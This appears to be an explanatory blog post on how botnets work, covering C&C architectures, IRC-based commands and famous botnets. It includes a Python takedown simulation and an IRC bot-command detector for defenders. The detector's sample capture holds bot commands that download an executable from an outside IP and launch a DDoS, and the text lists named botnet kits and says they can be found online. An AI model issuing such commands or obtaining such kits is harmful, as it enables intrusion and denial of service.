Ever wonder how hackers manage to do all the things they do? Many expert hackers do not simply log on to systems and work by hand. They get help from robots. Yes, robots: not the usual idea of a robot, but programs that earn the name because they work autonomously and automatically.
A botnet, short for robot network, is a group of computers running the same bot software under the control of a human operator, the botmaster, who uses them to carry out coordinated tasks. The system is organized in a simple hierarchy: many infected computers, called drones or zombies, and a command center that directs all of them into action. Botnets can be large (ten to twenty thousand drones) or small (five hundred to a thousand drones), depending on how sophisticated and complex the intended use is.
Botnets are prized tools in the hacking world because they let an attacker take over other people's computers for any purpose. If you know the security vulnerabilities of a network, its workstations and its servers, a sophisticated bot can bring all of its machines under your control in days, hours or even minutes. Once control is obtained, tasks can be carried out remotely or left to run autonomously.
It is hard to say who developed the first botnet or who wrote its software. I mean, honestly, who would want to claim ownership of software that was used to break into the systems of the NSA or the CIA? We can, however, trace its roots. In 1998, NetBus and Back Orifice (followed by Back Orifice 2000 in 1999) were introduced to the IT community. Both were sets of tools designed for friendlier remote administration of Microsoft Windows systems. If you haven't heard of them, they worked like the well-known GoToMyPC application, which lets you reach your home computer from almost anywhere and use it as if you were sitting in front of it. The difference is that they were built as a command base onto which additional software could be bolted for whatever purpose the author had in mind. Some users came up with malicious uses, such as pranks and eavesdropping. Over time, various groups independently refined the code, turning it into anything from a mild nuisance to nasty Trojan malware.
How are they made?
To understand how botnets are made, we first need to understand their known architectures. Currently, the most common architectures are the following:
- Centralized command and control (C&C) model
[Image: centralized command and control model, taken from http://www.malwarecity.com/blog/anatomy-of-a-botnet-196.html]
This is considered the first botnet architecture used. The botmaster logs in to any of the C&C servers, directly or remotely, to control and communicate with the other C&C servers and the drone computers. The secondary C&C is usually a backup in case the botmaster cannot reach the primary one. The botnet is not restricted to two C&C servers, nor to a single network: it can control drones on many different networks, depending on its level of sophistication.
- Decentralized, P2P or distributed command and control model
[Image: decentralized (P2P) command and control model, taken from http://www.malwarecity.com/blog/anatomy-of-a-botnet-196.html]
This is considered the more versatile architecture because any drone can act as the command center, which makes it much harder for anyone to pinpoint the source, and the botmaster does not have to worry about losing control when a single node is taken down.
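To make the difference between the two architectures concrete, here is an added illustration (not code from the original post) that builds both topologies as toy graphs and counts how many drones the botmaster can still reach after a takedown removes given nodes. The botnet sizes, the two-server centralized layout and the four-entry peer lists are assumptions chosen for the illustration.

```python
"""Model why P2P command and control is harder to take down than centralized C&C.

Added illustration, not code from the original post. Both topologies are
constructed toy graphs: a centralized botnet with a primary and a backup C&C
server that every drone knows about, and a P2P botnet in which every drone keeps
a short random peer list. Sizes and peer counts are assumptions.
"""
import random
from collections import deque


def build_centralized(n_drones, cc_servers=("cc1", "cc2")):
    """Star topology: every drone can reach every C&C server and nothing else."""
    graph = {cc: set() for cc in cc_servers}
    for i in range(n_drones):
        drone = f"drone{i}"
        graph[drone] = set(cc_servers)
        for cc in cc_servers:
            graph[cc].add(drone)
    return graph


def build_p2p(n_drones, peers_per_node=4, seed=0):
    """Every drone holds a short random peer list; links are bidirectional."""
    rng = random.Random(seed)
    nodes = [f"drone{i}" for i in range(n_drones)]
    graph = {n: set() for n in nodes}
    for node in nodes:
        others = [n for n in nodes if n != node]
        for peer in rng.sample(others, peers_per_node):
            graph[node].add(peer)
            graph[peer].add(node)
    return graph


def reachable_from(graph, start, removed):
    """Breadth-first search from the operator's entry point, skipping taken-down nodes."""
    if start in removed or start not in graph:
        return set()
    seen = {start}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        for nxt in graph[node]:
            if nxt not in removed and nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return seen


def drones_still_controllable(graph, entry, removed):
    """Number of drones reachable from one entry point after 'removed' are sinkholed."""
    return sum(1 for n in reachable_from(graph, entry, removed) if n.startswith("drone"))


def controllable_after_takedown(graph, entry_points, removed):
    """The operator logs in through whichever entry point survived the takedown."""
    return max(drones_still_controllable(graph, e, removed) for e in entry_points)


if __name__ == "__main__":
    central = build_centralized(1000)
    print("centralized, nothing down:", controllable_after_takedown(central, ("cc1", "cc2"), set()))
    print("centralized, primary down:", controllable_after_takedown(central, ("cc1", "cc2"), {"cc1"}))
    print("centralized, both down:   ", controllable_after_takedown(central, ("cc1", "cc2"), {"cc1", "cc2"}))
    p2p = build_p2p(1000)
    print("p2p, two peers down:      ", controllable_after_takedown(p2p, ("drone5",), {"drone0", "drone1"}))
```

Taking the backup server down with the primary leaves the centralized botnet headless, whereas the P2P botnet loses only the two peers that were removed; the operator only needs to know one live peer to regain control.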
Which Internet protocols are used to establish the connections? Almost any. Currently, though, the Internet Relay Chat (IRC) botnet is still the preferred kind. It is the favorite of many botmasters because it is lightweight, and a password-protected channel is considered secure enough for logging in and issuing commands. One example of an IRC-based botnet is Agobot, which comes with a packet sniffer, keylogger, rootkit, information harvester, SMTP and HTTP clients and a DoS attack feature.

Instant-messaging botnets also appeared, latching onto the AOL, Yahoo Messenger and MSN services. In August, the social networking site twitter.com was found to be hosting a botnet: its security team discovered that Twitter, reached over plain HTTP, was being used as a C&C channel. Security researchers at Symantec also found a botnet C&C in Google Groups this September; it was dubbed Trojan.Grups.
How do you turn other people's computers into zombies or drones? It still comes down to the basics of hacking: exploiting the network and every computer vulnerability you can find, including social engineering and email phishing expeditions.
Botnets accept a wide range of commands; some of the most common are listed below. Note that the exact commands vary from botnet to botnet.
Flood or DDoS – launches a DoS attack against a target.
Spam – downloads a template message and sends it out from the drones.
Proxy – conceals the operator's identity by relaying traffic through the infected computer.
http.download – downloads a file from the Internet onto the drone.
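Because IRC is the channel most of these bots use, the commands above are what a defender sees in the clear on the wire. The following added example (not code from the original post) parses constructed IRC traffic as a network sensor might log it and flags PRIVMSG lines carrying the command families listed above (flood/DDoS, spam, proxy, http.download). The dotted command syntax mirrors the Agobot family but the exact spellings, the sample lines and the country|OS nick pattern are assumptions for the illustration; real families differ.

```python
"""Flag bot-style command traffic in raw IRC lines.

Added example, not from the original post. SAMPLE_LINES is a constructed capture;
the dotted command syntax and the nick heuristic are assumptions.
"""
import re

# Constructed sample of raw IRC lines as a sensor might log them.
SAMPLE_LINES = [
    ":alice!a@home PRIVMSG #chan :hello everyone",
    ":bm!bm@c2.example PRIVMSG #chan :.ddos.syn 203.0.113.5 80 600",
    ":bm!bm@c2.example PRIVMSG #chan :.http.download http://203.0.113.9/up.exe c:\\up.exe 1",
    ":bm!bm@c2.example PRIVMSG #chan :.spam.start template.txt",
    ":bm!bm@c2.example PRIVMSG [US|XP]-48213 :.proxy.start 8080",
    ":alice!a@home PRIVMSG #chan :the download link is on the wiki",
    ":[US|XP]-48213!x@10.0.0.7 JOIN #chan secretkey",
]

# ":nick!user@host PRIVMSG target :text"
PRIVMSG_RE = re.compile(
    r"^:(?P<nick>[^!\s]+)!\S+\s+PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$"
)

# Heuristic (assumption): bot nicks of the form [COUNTRY|OS]-number.
BOT_NICK_RE = re.compile(r"^\[[A-Z]{2,3}\|[A-Za-z0-9]+\]-?\d+$")

# Command family -> pattern on the message text; ordered so the first match wins.
COMMAND_PATTERNS = {
    "ddos": re.compile(r"^\.(ddos|flood|syn|udp)(\.\w+)?\s+\S+"),
    "spam": re.compile(r"^\.spam(\.\w+)?\b"),
    "proxy": re.compile(r"^\.(proxy|socks\d?)(\.\w+)?\b"),
    "download": re.compile(r"^\.(http\.download|download|update)\s+\S+"),
}


def classify_line(line):
    """Return a hit dict for a PRIVMSG carrying a known bot command, else None."""
    m = PRIVMSG_RE.match(line)
    if not m:
        return None
    text = m.group("text").strip()
    for family, pattern in COMMAND_PATTERNS.items():
        if pattern.match(text):
            return {"family": family, "nick": m.group("nick"),
                    "target": m.group("target"), "text": text}
    return None


def scan(lines):
    """All command hits in capture order; ordinary chat is ignored."""
    return [hit for hit in (classify_line(l) for l in lines) if hit]


def commanders(hits):
    """Count commands per issuing nick: the busiest nick is the likely botmaster."""
    counts = {}
    for hit in hits:
        counts[hit["nick"]] = counts.get(hit["nick"], 0) + 1
    return counts


def bot_nicks(lines):
    """Nicks in message prefixes that match the [COUNTRY|OS]-number heuristic."""
    nicks = set()
    for line in lines:
        if line.startswith(":"):
            prefix = line[1:].split("!", 1)[0]
            if BOT_NICK_RE.match(prefix):
                nicks.add(prefix)
    return nicks


if __name__ == "__main__":
    hits = scan(SAMPLE_LINES)
    for hit in hits:
        print(f"{hit['family']:<9} {hit['nick']} -> {hit['target']}: {hit['text']}")
    print("commanders:", commanders(hits))
    print("suspected bot nicks:", bot_nicks(SAMPLE_LINES))
```

The patterns key on a leading dot so that normal chat mentioning "download" is not flagged; in practice you would tune the command table to the family you are hunting and feed the hits into whatever alerting you already have on IRC traffic leaving the network.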
Who makes them?
Most botnet software is distributed freely and without any warranty, and it is even possible to build your own on top of kits that are already sold commercially. Remember that this software is widely classified as malware or a Trojan. Never install it unless you fully understand what it does. Botnets are closely related to viruses, other malware and rootkits.
What are they used for?
Botnets are among the best tools for doing what any hacker would want to do. You could remotely eavesdrop or play pranks: log or inject keystrokes, capture screens, launch programs, browse files and so on. More broadly, botnets are used for unethical and unlawful commercial purposes: phishing, sending spam, click fraud to inflate a website's popularity, harvesting and planting information, commanding and controlling the machines of an agency, acting as a proxy to cover your tracks while doing reconnaissance, and, lastly, denial of service attacks. Botmasters can even sell their bot farms to the highest bidder, usually the mafia or other large criminal organizations.
What are the largest botnets?
The largest known botnet attack ever recorded was Storm in 2007. More recently, in April 2008, another botnet was uncovered that had infected nearly two million personal computers, though its name has not been made official. The Storm botnet was mostly used for spamming and communicated over a Kademlia-based P2P overlay rather than an IRC network. It also carried a rootkit to hide its presence and could harvest email addresses from its infected drones.
Some Common Types
The open-source community does not support the creation or distribution of malicious software such as botnets. You can, however, find botnet kits on some underground hacker websites and even on torrents, and you can look them up on Google. Some of these are: urxbot, spybot, sdbot, rxbot, rbot, phatbot, litmus, gtbot, forbot, evilbot, darkirc, agobot, acebot and storm.